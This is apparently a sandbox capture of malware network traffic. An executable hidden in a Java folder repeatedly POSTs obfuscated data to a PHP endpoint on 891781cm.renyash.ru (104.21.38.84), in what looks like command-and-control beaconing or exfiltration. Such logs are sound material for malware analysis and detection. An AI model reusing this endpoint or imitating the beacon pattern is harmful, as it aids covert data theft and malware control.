Jan 1, 2025 15:03:09.113622904 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:09.462626934 CET | 1796 | OUT | Data Raw: 50 52 58 52 5a 5b 54 5d 55 5a 54 59 51 58 55 55 58 58 5c 5c 59 53 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PRXRZ[T]UZTYQXUUXX\\YSR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+/-Z48.%=)])-<02T:0,!''Y,'<X =#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:09.593059063 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:09.767405987 CET | 959 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVS0F22oF%2FT103FRF9Yy%2BcwkzHFr8drUeJacaTaWB%2F7GLvfL44cysYg3ChW6c%2BTWzTHIOMQdicYNY7fD7f94CWFtxTS%2By%2FW6usH53HHHT40I3T2IxzN1SDw6kR0kH75OuInuEEeW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d18a8134213-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7672&min_rtt=5899&rtt_var=5759&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=72676&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1d 27 02 27 5c 2b 10 3d 01 2c 2f 28 0f 32 3f 04 59 30 09 2f 06 26 3e 3d 59 3a 38 02 5a 3e 28 2f 59 26 14 03 58 23 21 0f 01 25 26 2e 5d 04 1d 26 01 3d 04 2a 58 3f 2c 35 5e 2a 1c 30 1b 30 37 2f 5d 26 42 20 59 27 13 32 58 36 32 27 53 27 1d 3c 56 3f 39 3b 5b 24 03 2d 0d 21 3a 2e 57 0d 12 22 1c 26 3e 22 0b 28 22 3b 0c 22 02 23 55 24 2c 20 09 24 2c 0e 50 37 38 25 0b 29 2c 30 12 23 37 04 09 30 2a 27 12 35 39 0b 5d 21 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"''\+=,/(2?Y0/&>=Y:8Z>(/Y&X#!%&.]&=*X?,5^*007/]&B Y'2X62'S'<V?9;[$-!:.W"&>"(";"#U$, $,P78%),0#70*'59]!"T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  81 | 192.168.2.4 | 49908 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:09.232397079 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:09.587450027 CET | 1072 | OUT | Data Raw: 50 51 58 5c 5a 5c 54 5e 55 5a 54 59 51 52 55 54 58 58 5c 54 59 51 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQX\Z\T^UZTYQRUTXX\TYQR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \(4"29\(.'$4-?$<*W&,;[,(><W*#^!'^)
                                                                                                                  Jan 1, 2025 15:03:09.748032093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:09.915082932 CET | 819 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBuTePgo9CVd2zSsqryrL%2By%2BYw76sWxj9JRfBWB%2B%2Fd%2FwtUiLA7I%2FFDOTTToIAUn6chOoyCwi%2FYRcMeY%2BGO0nh%2FFQI4ZJ4VU0cwS%2F0AbATBVTiynBhWNslwsNyr4K2CbYXuLjlQAd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d19af9b1861-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7821&min_rtt=1477&rtt_var=13242&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=27953&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  82 | 192.168.2.4 | 49914 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:10.043421030 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:10.400114059 CET | 1072 | OUT | Data Raw: 55 5f 58 57 5f 5d 51 5e 55 5a 54 59 51 52 55 53 58 5d 5c 5b 59 53 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_XW_]Q^UZTYQRUSX]\[YSRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^?781$=5\)-('$..4+$Y"V'(->4Z?.#)<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:10.487409115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:10.661891937 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9JoRBzgjN3u%2BWhrYQE2zsL6oxqusPxRIWKjTQFqJNczRBBUmHk5nJBWpBk7NdWTcsXHOp8zwfPDfizRy5%2FR9gBI2Efrf8dLG1Jm%2Fes%2FKfw6L90FGuvDLLps5cdUN%2FAEN18vXmf3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d1e497642db-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2334&min_rtt=1771&rtt_var=1790&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=232632&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  83 | 192.168.2.4 | 49920 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:10.808171988 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:11.165872097 CET | 1072 | OUT | Data Raw: 55 57 58 55 5a 5b 51 59 55 5a 54 59 51 5c 55 5c 58 5d 5c 58 59 55 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWXUZ[QYUZTYQ\U\X]\XYUR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?-X!+&1\(.3Y3&.<Y$<"Q'8,<=,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:11.305015087 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:11.559890032 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCzt2yLbp27QY4%2BkeV0WOA3dYAYPNok%2F1flUFLpOpNC3GOr3xtHjc2%2Fi%2BTx4fU4T6lUTG%2FYDpauCnaLKE04mpsRGzu2vebL5y9YcqfrcNjnC7M71OjaniloQyy3k8fBnjXTNqFOQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d235e0e438e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13410&min_rtt=9008&rtt_var=12182&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=33013&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  84 | 192.168.2.4 | 49926 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:11.683334112 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:12.040586948 CET | 1072 | OUT | Data Raw: 55 53 58 50 5f 5a 54 5a 55 5a 54 59 51 58 55 57 58 53 5c 5c 59 57 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: USXP_ZTZUZTYQXUWXS\\YWRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \+?>4;!&>")>43$.T:4_3?6U0</.Z?X;*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:12.181523085 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:12.439600945 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8126cVocQ%2BcEHGXiSAJzdDKS3QvQ3wRCIO3NyuHG7jrdshgbVoiDBneTupHsW%2B5oaPZCWP65jU6ANx4dhMQtVmXwuOExOleNxURjaRRvgVeXJGGsuhUiv1Gnpna8xBGTELYrOOM"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d28df15efa3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3235&min_rtt=1976&rtt_var=3259&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=121151&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  85 | 192.168.2.4 | 49933 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:12.559117079 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:12.915631056 CET | 1072 | OUT | Data Raw: 55 5f 58 5c 5f 5b 51 5e 55 5a 54 59 51 5e 55 5d 58 53 5c 5b 59 51 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_X\_[Q^UZTYQ^U]XS\[YQRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ )/ 8%Y%1Z*$$:(^',>3,+Y-.8Z(=8(,#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:13.002176046 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:13.267893076 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LogtOrQtYKKtv8Y%2B5Ea3o%2FurBRgm7LjE9LrUGTUSeRPhXGgLF5NgOsmm%2FJfPB6j1Izzyyw23XBBuBf4dESaZaD18PfJhu17a96lqqFRV3kCjPaC7mxSEVV%2Bk6nkt7TgU8DQsuZUL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d2df8d84407-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2366&min_rtt=1720&rtt_var=1937&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=211870&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  86 | 192.168.2.4 | 49941 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:13.403805017 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:13.759521961 CET | 1060 | OUT | Data Raw: 55 54 58 51 5a 5c 51 5a 55 5a 54 59 51 5b 55 55 58 53 5c 5e 59 52 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXQZ\QZUZTYQ[UUXS\^YRRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+<!7]-X1.:>#[$'9,4%?53/0,='?#=<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:13.879434109 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:14.139358997 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lthV9Z4qfepZzkHlL4HFubLdjj0ynRDyAdqHdg65Jw98dMi4qHc5GtV8QCcdUJ0d8GpeG7b8c0XVJqLfJ7oL0S04rZp6s8FNZWrHxl7OIj9IoqIwnsvBMpV1jIZvg0BWoZj6myFB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d337e116a50-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3760&min_rtt=2081&rtt_var=4139&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1404&delivery_rate=94084&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  87 | 192.168.2.4 | 49947 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:14.297403097 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:14.649950981 CET | 1072 | OUT | Data Raw: 55 55 58 50 5a 56 51 5a 55 5a 54 59 51 5e 55 50 58 59 5c 54 59 54 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UUXPZVQZUZTYQ^UPXY\TYTR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+,-7*1-%Z)Z&4",$Y'?200,<),#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:14.740761995 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  88 | 192.168.2.4 | 49950 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:14.782183886 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:15.134434938 CET | 1796 | OUT | Data Raw: 55 50 5d 54 5a 5b 54 59 55 5a 54 59 51 5f 55 53 58 5f 5c 5c 59 54 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UP]TZ[TYUZTYQ_USX_\\YTR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +/14;22:>Z372T.$<\'Y.&,0,>,[(-7(,#^!'^)7
                                                                                                                  Jan 1, 2025 15:03:15.226138115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:15.436764002 CET | 961 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1m69U%2F8GEPw%2Bkljqondm4JqigL13%2FVE8Gr95tl%2B78vcNe4i90JOvcEEoCh6StwnT17LJodO6Dg6a7W3MrszsBG8iJG%2FsE%2BFY%2Bet7aAYCKHFPRTYFSzBUcUeDWIgMFwRCYfFVNuBW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d3bddfe8c3f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2010&rtt_var=838&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=621276&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
